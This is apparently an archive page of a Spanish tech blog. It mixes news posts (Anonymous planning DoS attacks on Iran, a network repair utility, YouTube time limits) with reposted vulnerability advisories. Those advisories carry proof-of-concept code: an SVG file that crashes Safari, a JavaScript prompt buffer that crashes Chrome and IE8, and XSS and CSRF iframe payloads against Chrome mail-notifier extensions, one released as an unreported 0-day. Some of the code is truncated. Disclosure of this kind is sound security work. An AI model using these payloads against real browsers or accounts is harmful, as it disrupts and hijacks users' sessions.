Archive for the 'Google' Category

No os preocupéis, sigo vivo !

Comentaros que aunque no me veáis escribir mucho por aquí ello tiene un signifcado; me estoy centrando más en un blog que comencé hace unos años en forma de proyecto y estoy dejando un poco de lado este, puesto que este es más de carácter personal y aquel más de carácter general por ello publico todo lo relacionado con la informática y algún que otro tema offtopic.

Click sobre la imágen para acceder 🙂

Anonymous atacará Irán mediante DoS

El grupo hacktivista Anonymous vuelve a entrar en acción. Ya se contó como filtraron el plan de EE.UU. para acabar con WikiLeaks en un polémico Power Point, y hace poco planeaban un boicot contra Sony por el famoso caso GeoHot.

Esta vez le toca el turno a Irán y a varios de sus sitios web ya que como han proclamado mañana mismo comienza la llamada “Operación Irán”.

En la nota, que descubro gracias a CNET, se llama a los más respetables y honorables ciudadanos de Irán a entrar en acción el día internacional de los trabajadores y colaborar así con una operación con la que Anonymous planea tumbar varios puntos estratégicos mediante una serie de ataques DoS.

Gente de Irán — vuestros derechos os pertenecen. Tenéis derecho a expresaros libremente y a la libertad de prensa, la libertad de reuniros y de estar seguros, de vivir libres y sin miedo. En el Día Internacional de los Trabajadores Anonymous está con vosotros.

No se dice mucho más sobre los objetivos concretos, pero se cree que Anonymous habría empezado la operación dejado varios mensajes en diferentes sitios web que habían sido atacados por el ciber-ejército iraní. Veremos que pasa mañana.

Seguir leyendo ‘Anonymous atacará Irán mediante DoS’

Complete Internet Repair, solución a los problemas de conexión

Leyendo ghacks descubro una sencilla pero completa utilidad que se encargará de hacer las comprobaciones pertinentes por nosotros. Se trata de Complete Internet Repair, un programa gratuíto, de muy poco peso y que además es totalmente portable.

Según evoluciona la web y nuestra forma de vida nos vemos más y más ligados a Internet de modo que tan sólo con una conexión a la red es posible acceder a datos que de ninguna otra forma llevaríamos encima, datos en muchas ocasiones críticos.

Un buen día llegas a casa y te dispones a mirar tu correo cuando de repente notas algo raro. La página tarda en cargar. No pasa nada, seguro que es normal. Tras más de 20 segundos esperando, nuestras peores sospechas se confirman: no hay Internet. Entonces por orden realizamos una batería de pruebas para intentar dar con el problema.

Complete Internet Repair nos ayuda con ellas y entre otras cosas es capaz de realizar las siguientes acciones:

  • Resetear el protocolo TCP/IP
  • Reparar Winsock
  • Renovar la conexión a Internet
  • Renovar la caché DNS
  • Resetear la configuración del Firewall de Windows
  • Reparar las conexiones SSL
  • Restaurar el archivo hosts
  • Reparar los equipos del grupo de trabajo

El uso de la aplicación es muy sencillo. Basta con ejecutar y seleccionar las acciones a realizar de la lista, de manera individual o todas a la vez. Tras iniciar las operaciones podremos ir leyendo el estado de las mismas mediante en la misma ventana mediante un completo log.

Seguir leyendo ‘Complete Internet Repair, solución a los problemas de conexión’

YouTube sin límites de tiempo

Buenas noticias para todos los usuarios con cuenta en YouTube. El portal prepara la llegada de vídeos sin límites de tiempo. Tras la llegada en septiembre de la ampliación a 15 minutos como máximo, Google ha dado permiso a algunos usuarios para alojar vídeos sin límite, un acción claramente destinada a implantarla poco poco y de manera escalonada para todos.

Las primeras admisiones son cuentas estables que desde YouTube explican como “usuarios con trayectoria de cumplir con las reglas de Comunidad del portal”, vamos, que han seleccionado cuidadosamente para que no se les cuele algún “insensato”. También nos podemos imaginar que habrá una pequeña censura a todos aquellos usuarios que algún momento hayan violado los términos de copyright de la web.

Este paso, grande para todos nosotros, también puede ocasionarles más de un problema al portal, ya que habría posibilidad de subidas de vídeos completos, ya sean películas o series, aunque desde Google afirman que este momento es muy propicio, principalmente por los avances en la identificación de contenidos:

Más de 1000 socios a nivel mundial utilizan el Content ID para administrar su contenido en YouTube, incluyendo los principales estudios de cine de Estados Unidos y sellos discográficos. Seguimos tan involucrados como siempre en la construcción y mejora de la tecnología más sofisticada para ayudar a los propietarios de derechos de autor a proteger sus derechos

En cualquier caso y hasta que comiencen a ofrecer a toda la comunidad la posibilidad de vídeos sin límites, iremos recibiendo noticias de aquellos usuarios que ya disfrutan de él.

Seguir leyendo ‘YouTube sin límites de tiempo’

Safari for windows Invalid SGV text style Webkit.dll DoS

###################################################
Safari for windows Invalid SGV text style  Webkit.dll DoS
Afectado: http://www.apple.com
Reportado por: http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html
Notificación al afectado: Sí Exploit disponible: Sí
###################################################

Safari Browser (en windows) es vulnerable siendo propenso a Denegaciones de Servicio, este problema afecta a webkit.dll y se bloquea al tratar de hacer que Safari abra una imagen SGV con un tamaño grande de fuente.

############
versiones
############

Safari para windows 5.0.1 (7533.17.8)
en windows 7 ultimate completamente parcheado.

Safari para windows windows 5.0.1 (7533.17.8)
en windows xp home sp3 completamente parcheado.

############
Línea de tiempo
############

Descubierto:19-08-2010
Notificado al vendedor:25-08-2010
Respuesta del vendedor:26-08-2010
Publicado: 30-09-2010

####################
PoC
####################

Guarda el código como «image.svg» y ábrelo con Safari, mirad como se añaden algunos píxeles «extra» en estilo de la fuente en el tamaño del texto.

################ BOF image.svg ######################

<?xml version=»1.0″?>
<svg xmlns=»http://www.w3.org/2000/svg» width=»200″ height=»200″ version=»1.1″>
<defs>
<mask id=»crash»>
<polygon points=»155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074
220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074
51,121.538 129.666,119.935″
transform=»matrix(1 0 0 1.04643 1.9873e-014 -6.73254)
translate(-52.381 -37.9218)»
style=»fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1″ />
</mask>
</defs>

<g mask=»url(#crash)» style=»font-family:Verdana; font-size: 10pt; fill:red;»>
<text x=»80″ y=»80″ style=»font-size:111000000pt; fill:pink;»>Safari</text>
<text x=»0″ y=»130″ style=»font-size: 60pt; fill:pink;»>Now</text>
<text x=»20″ y=»190″ style=»font-size: 60pt; fill:pink;»>Crash</text>
</g>

</svg>

###############EOF####################

################# €nd ###############

Thnx To cLimbo for his patience and support.

Atentamente:
Lostmon (lostmon@gmail.com)

thz Lost 😉

Google Chrome and Chrome frame Prompt DoS

###############################################
Google Chrome and Chrome frame Prompt DoS
Afectado: http://www.google.com
Reportado por: http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Reporte en español: http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Notificación al afectado: Exploit disponible:
###############################################

Este bug ha sido descubierto por mí y ha sido testeado e investigado por cLimbo de #Ayuda-informaticos de la red iRC-Hispano (podéis encontrarnos allí)

#########
Resumen
#########

Algunas veces la necesidad de aplicaciones web en el sistema exponen algunos datos de los usuarios, se pueden vulnerar a través de un código Javascript, o por medio de formularios html, etcétera..

En el caso del código en Javascript pide accecer a los datos del sistema (la pregunta en sí es) es muy extenso ?

################

Google Chrome es propenso a una vulnerabilidad de denegación de servicio a través de «mensajes de alerta» cuando los datos esperados son muy extensos.

No sé si esto puede ser a su vez en una ejecución remota de código o una corrupción de la memoria o similares, pero creo que esta vulnerabilidad necesita analizarse y posteriormente parchearse.

###################
Versiones testeadas
###################

En todos los casos de Google Chrome es el vector el que produce alguna incongruencia en todos los sistemas 🙂

######################
MAC OS X leopard 10.5
######################

Google Chrome5.0.375.126 (Build oficial 53802) WebKit 533.4
V8 2.1.10.15
User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US)
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4
Command Line /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818

In all cases OS X closes all Chrome Windows.( Chrome Crash)

##############
ubuntu 10.04
##############
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04
WebKit 533.4
V8 2.1.10.14
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
Command Line /usr/lib/chromium-browser/chromium-browser

In al cases Chrome is minimized and denies the access to
«window manager button» and we can´t no change beetwen applications
that we have open.

##################
Windows 7 32 bits
###################

Google Chrome 5.0.375.86 (Build oficial 49890)
on windows 7 ultimate fully patched.

It causes a DoS in chrome and a DoS in IE8 when
exploit it across Google Chrome Frame.

###############
Debian 2.6.26
###############

Google Chrome 6.0.472.25 (Build oficial 55113) devWebKit 534.3
V82.2.24.11
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3

in all cases Debian Closes all chrome Windows.( Chrome Crash)

####################
PoC
####################

Este PoC ha sido testeado en win7 32 bits, chrome and chrome frame en conjunto con IE8 causando una denegación de servicio en IE8.

#############################

<meta http-equiv=»X-UA-Compatible» content=»chrome=1″>
<h1> wait 10 or 11 seconds :)</h1>
<script>

function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape(‘%u0c0c%u0c0c’), 38000);
prompt(buffer);
}
setTimeout(‘DoS()’,1000);
</script>
// <![CDATA[
function do_buffer(payload, len) {
while(payload.length

################# EOF ###################

Este segundo PoC es para ser testeado en Linux o en Mac OS X

#######################################
<h1> wait 10 or 11 seconds :)</h1>
<script>
function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape(‘%u0c0c%u0c0c’), 50000);
prompt(buffer);
}
setTimeout(‘DoS()’,1000);
</script>

################# EOF ###################

// <![CDATA[
function do_buffer(payload, len) {
while(payload.length ############
Referencias
############
Vuln relacionada:
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html

Google chrome bugtrack:
http://code.google.com/p/chromium/issues/detail?id=47617

################### €nd ###################

Thnx To cLimbo for his patience and support.

atentamente:
Lostmon (lostmon@gmail.com)
————

thz Lost 😉

Google Services Notifier Chrome extension XSS/CSRF

######################################
Google Services Notifier Chrome extension XSS/CSRF
extension: https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie
reportado por: http://lostmon.blogspot.com/2010/06/google-services-notifier-chrome.html
Exploit disponible: Sí Notificación al desarrollador: No
#######################################

En este caso el “notificador para Google Wave Chrome” tiene un bug que permite a atacantes realizar ataques XSS.

Todas las extensiones se ejecutan sobre su origen y no tienen forma de alterar los datos de la extensión u obtener datos sensibles como; cuenta de correo electrónico o contraseña, etc.

Podemos observar como muchos usuarios se han instalado esta extensión => https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie
109 usuarios lo han instalado (WoW)

############
explicación
############

Los servicios de Google permite a los usuarios usar el notificador para ver cuando tienen un nuevo wave y ver también una vista previa de la misma.

«Mantente al día con los servicios de Google como Google Mail, Blogger, Reader, YouTube,
Google Docs, Google Wave servicios, etc. Se añadirá más información en breve.
»

Si un atacante crea un nuevo wave con el código HTML o JavaScript en el cuerpo y lo envía a la víctima el código se ejecuta, cuando la víctima haga click para ver la vista previa de los waves.

Asi que para aprovechar que tenemos que crear un wave “especial” por ej, si ponemos directamente en el cuerpo del correo un iframe:

«><iframe src=»javascript:alert(location.href);»></iframe>

En los dos casos el alert se ejecuta cuando trata de abrir una vista previa del correo electrónico con la extensión :) que se ejecuta en el valor de contexto que es: location.href el valor sería: “about:blank”
Por ejemplo enviando un wave con un cierre de sesión con el cuerpo:

“><iframe src=”https://wave.google.com/wave/logout”></iframe>

Se cerraría la sesión en google wave, esto es un CSRF.

######################€nd################################

Thnx for your time !!!
atentamente: Lostmon (lostmon@gmail.com)
—–

thz Lost 😉

Notifier for Google Wave Chrome extension XSS/CSRF

######################################
Notifier for Google Wave Chrome extension XSS/CSRF
extension: https://chrome.google.com/extensions/detail/aphncaagnlabkeipnbbicmcahnamibgb
reportado por: http://lostmon.blogspot.com/2010/06/notifier-for-google-wave-chrome.html
Exploit disponible: Sí Notificación al desarrollador: No
#######################################

Seguimos, en este caso el «notificador para Google Wave Chrome» tiene un bug que permite a atacantes realizar ataques XSS.

Todas las extensiones se ejecutan sobre su origen y no tienen forma de alterar los datos de la extensión u obtener datos sensibles como; cuenta de correo electrónico o contraseña, etc.

Podemos observar como muchos usuarios se han instalado esta extensión => https://chrome.google.com/extensions/detail/aphncaagnlabkeipnbbicmcahnamibgb
56,542 usuarios se lo han instalado (WoW)

############
explicación
############

El Notificador de Google Wave permite a los usuarios ver cuando tienen un nuevo wave y ver una vista previa de la misma.

Si un atacante crea un nuevo wave con el código HTML o JavaScript en el cuerpo y lo envía a la víctima el código se ejecuta, cuando la víctima haga click para ver la vista previa de los waves.

Asi que para aprovechar que tenemos que crear un wave «especial» por ej, si ponemos directamente en el cuerpo del correo un iframe: «><iframe src=»javascript:alert(location.href);»></iframe>

En los dos casos el alert se ejecuta cuando trata de abrir una vista previa del correo electrónico con la extensión :) que se ejecuta en el valor de contexto que es: location.href el valor sería: “about:blank”

Por ejemplo enviando un wave con un cierre de sesión con el cuerpo:

«><iframe src=»https://wave.google.com/wave/logout»></iframe>

Se cerraría la sesión en google wave, esto es un CSRF.

######################€nd#################################
.

Thnx for your time !!!

atentamente:
Lostmon (lostmon@gmail.com)
—–

thz Lost 😉

Gmail Checker plus Chrome extension XSS/CSRF (Parte II)

######################################
Gmail Checker plus Chrome extension XSS/CSRF II
extension: https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe
reportado por: http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension.html
Exploit disponible: Sí Notificación al afectado: No
#######################################

En este caso «Google Mail Checker Plus» la versión 1.1.7 (02/10/2010) tiene un bug que permite a atacantes realizar ataques XSS.

Todas las extensiones se ejecutan sobre su origen y no tienen forma de alterar los datos de la extensión o de obtener datos sensibles como; cuenta de correo electrónico o contraseña, etc.

si observamos cómo muchos usuarios han instalado esta extensión =>
https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe
303.711 usuarios lo han instalado ya (WoW)

############
explicación
############

Google Mail Checker Plus permite a los usuarios ver cuando tienen un nuevo correo y ver una vista previa del correo.

Si un atacante crea un nuevo correo con código HTML o JavaScript en el cuerpo y lo envía a la víctima, el código se ejecuta, cuando la víctima haga click en él para ver una vista previa del correo.

Así que para aprovechar que tenemos que crear un correo «especial» como por ej, si ponemos directamente en el cuerpo del correo un iframe; «><iframe src=»javascript:alert(location.href);»></iframe> la extensión muestra el código en texto plano y la descripción no se ejecuta.. tenemos que utilizar una característica de gmail (autoconversión de enlaces automática al clickar urls) con ellas podemos crear un cuerpo de correo electrónico con un enlace http como:

http://»><iframe src=»javascript:alert(location.href);»></iframe>

o crear un mail con el link:

lalala@»><iframe src=»javascript:alert(location.href);»></iframe>.com

En los dos casos el alert se ejecuta cuando trata de abrir una vista previa del correo electrónico con la extensión 🙂 que se ejecuta en el valor de contexto que es: location.href el valor sería: «about:blank»

Gmail es un lugar seguro, pero las extensiones para su gestión pueden ser un vector potencial de ataque.

Por ejemplo, podemos enviar un correo electrónico con un cierre de sesión en gmail creando en el cuerpo:

http://»><iframe src=»https://mail.google.com/mail/?logout&hl=es»></iframe>

Como comprobaréis no se cierra la sesion en gmail, se trata de un CSRF.

Asimismo, si el usuario tiene opción de marcar para mostrar notificaciones en el escritorio y de esta manera se puede ejecutar también el iframe en la ventana de notificaciones del escritorio y puede causar una denegación de servicio de extensión, por ejemplo, si la víctima trata de cambiar alguna opción en las opciones de la página de extensión 😛

Estas diferencias las tenemos en: http://code.google.com/p/chromium/issues/detail?id=45401

El desarrollador ha comunicado una versión del parche en el repositorio sobre otros problemas.

Véanse las referencias anteriores sobre las vulns: => OSVDB ID :65459 and OSVDB ID: 65460
y su posterior parche =>
http://github.com/AndersSahlin/MailCheckerPlus/blob/54ab118e505feae819e676c8e525e8fe5409c981/src/mailaccount.class.js
y esta => http://github.com/AndersSahlin/MailCheckerPlus/commit/54ab118e505feae819e676c8e525e8fe5409c981#diff-0

Lo lanzo como 0-day y no notifico a los proveedores ya en las vulns anteriores en el parche no hicieron ninguna a ésta y robaron créditos por el reporte. Esta vez no se notificarán a los desarrolladores 🙂

######################€nd#################################
.

Thnx for your time !!!

atentamente:
Lostmon (lostmon@gmail.com)

thz Lost 😉

Gmail Checker plus Chrome extension XSS

######################################
Gmail Checker plus Chrome extension XSS
Extensión: https://chrome.google.com/extensions/detail/mihcahmgecmbnbcchbopgniflfhgnkff
Reportado por: http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension-xss.html
Exploit disponible:
#######################################

En este caso «Google Mail Checker Plus» la versión 1.1.7 (02/10/2010) tiene un bug que permite a atacantes para realizar ataques XSS.

Todas las extensiones se ejecutan sobre su origen y no hay forma de alterar datos o la extensión para obtener datos sensibles como; cuentas de correo electrónico, contraseñas, etcétera.

Podemos observar cuántos usuarios se han instalado esta extensión =>
https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe 303,711 users (WoW)

############
Explicación
############

Google Mail Checker Plus permite a los usuarios ver cuando tienen un nuevo correo y
ver una vista previa del correo…

Si un atacante compone un nuevo correo con el código HTML o JavaScript en el campo del asunto y lo envía a la víctima, el código se ejecuta cuando haga click la víctima en la extensión para ver el correo y la víctima cuando acepte la alerta y ver una vista previa del correo el iframe se ejecutará a su vez.

Gmail es un lugar seguro, pero la extensión a su manejo, puede ser un potencial vector para atacarlo.

Por ejemplo; podríamos enviar un correo electrónico que accione el cierre de sesión en GMail y ponemos en el asunto:

«><iframe src=»https://mail.google.com/mail/?logout&hl=es»<>/iframe>

Con esto se cerraría la sesion de GMail, se trata de un XSRF, y, en el caso de lo que tú dices es ejecutado en el contexto y el valor location.href es: «about:blank»

Por lo que tenemos disputas en: http://code.google.com/p/chromium/issues/detail?id=45401

El desarrollador ha comunicado una versión del parche en trunk: http://github.com/AndersSahlin/MailCheckerPlus/blob/54ab118e505feae819e676c8e525e8fe5409c981/src/mailaccount.class.js

Podéis bajarlo y copiarlo a la carpeta de la extensión para solventar el problema.

Ver Diff: http://github.com/AndersSahlin/MailCheckerPlus/commit/54ab118e505feae819e676c8e525e8fe5409c981#diff-0

######################€nd#################################
.

Thnx for your time !!!

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/

—-

thz Lost 😉


Blog Stats

  • 620.807 visitas

RSS

Feed
May 2024
L M X J V S D
 12345
6789101112
13141516171819
20212223242526
2728293031  

Usuarios online:

counter

Otras URL’s

TiraEcol

Tira Ecol
BlogESfera Directorio de Blogs Hispanos - Agrega tu Blog
Google PageRank 
		Checker